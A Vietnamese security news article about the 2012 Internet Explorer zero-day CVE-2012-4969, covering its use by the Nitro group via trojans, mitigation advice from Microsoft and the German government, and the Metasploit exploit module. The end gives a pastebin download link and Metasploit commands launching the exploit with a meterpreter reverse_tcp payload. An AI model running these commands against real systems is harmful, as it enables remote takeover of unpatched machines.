Đã có mã khai thác thành công lỗi 0-day Internet Explorer, nguy cơ bị cài đặt malware từ xa (CVE 2012-4969 )
Microsoft có thông cáo xác nhận chính thức về lỗi 0-day (CVE 2012-4969) trong Internet Explorer. Hiện đã có 4 mã khai thác thành công lỗi này đang được truyền tay trên internet. Microsoft sẽ cung cấp khẩn cấp một bản vá tạm thời để sửa lỗi nghiêm trọng này.
Chuyên gia bảo mật Eric Romang đã xác định được mã khai thác lỗi Internet Explorer CVE 2012-4969 này được đặt tại một server của nhóm hacker “Nitro” – nhóm vốn được cho rằng là tác giả của mã khai thác nhằm vào lỗi 0-day của Java vào tháng trước. Công ty bảo mật Rapid7 khuyến cáo người dùng nên chuyển qua sử dụng trình duyệt khác thay thế IE.
Lỗi 0-day trong IE lần này là lỗi “use-after-free memory corruption” một dạng lỗi tương tự với dạng lỗi “buffer overflow”, lỗi này khiến cho máy tính cài đặt phiên bản IE bị lỗi dễ dàng bị hacker cài đặt các malware, virus, trojan từ xa. Mã khai thác đầu tiên được tìm thấy trong trojan PoisonIvy, một mã khai thác khác được tìm thấy trong trojan PlugX, cả 2 trojan này đều được ngụy trang dưới dạng một tập tin Flash Movie ( .swf ) bị thỏa hiệp.
Kiểu tấn công này thường bắt đầu bằng việc nạn nhân nhận được một email giả mạo hoặc một lời mời click vào một đường link không an toàn. Các chuyên gia an ninh mạng khuyến cáo rằng các trang web lớn hiện có đặt các quảng cáo trên website của họ có thể trở thành mồi ngon cho hacker, nếu như các máy chủ đặt các quảng cáo ( vốn độc lập với máy chủ chứa website ) bị hack. Qua đó hacker có thể dùng các website lớn để thực hiện việc tấn công diện rộng đối với những người dùng truy cập các website lớn đó
Trong một diễn biến khác, chính phủ Đức đã khuyến cáo các công dân Đức rằng họ nên thay Internet Explorer bằng một trình duyệt khác như Firefox, Chrome, Opera… . Microsoft thì khuyến cáo người dùng nên tắt chức năng ActiveX controls trên IE hoặc sử dụng Enhanced Mitigation Experience Toolkit cho đến khi họ cung cấp bản vá cho lỗi này
Công cụ khai thác lỗi huyền thoại Metasploit cũng đã cập nhật mã khai thác này với một thông báo: “Module khai thác mới này chứa mã khai thác nhắm vào lỗi 0-day mới của Microsoft Internet Explorer. Khi IE render một trang HTML, đối tượng CMshtmlEd đã bị xóa bỏ trong quá trình render, nhưng vùng nhớ của đối tượng này lại bị sử dụng lại một lần nữa bởi hàm CMshtmlEd::Exec(), điều này dẫn tới lỗi use-after-free ( gọi vùng nhớ sau khi vùng nhớ đã được làm trống ). Vui lòng ghi nhận rằng lỗi này đã được khai thác từ ngày 14 tháng 09 năm 2012 và cho đến hiện giờ vẫn chưa có bản vá cho lỗi này” .
Tải về module khai thác này tại đây http://pastebin.com/nyYxKfUJ
Cách sử dụng:
Code:
use exploit/windows/browser/ie_execcommand_uaf
set SRVHOST 192.168.178.33
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.33
exploit
sysinfo
getuid
(theo TheHackerNews)
xnohat - HVA News
Tham khảo:
http://thehackernews.com/2012/09/exploit-released-for-internet-explorer.html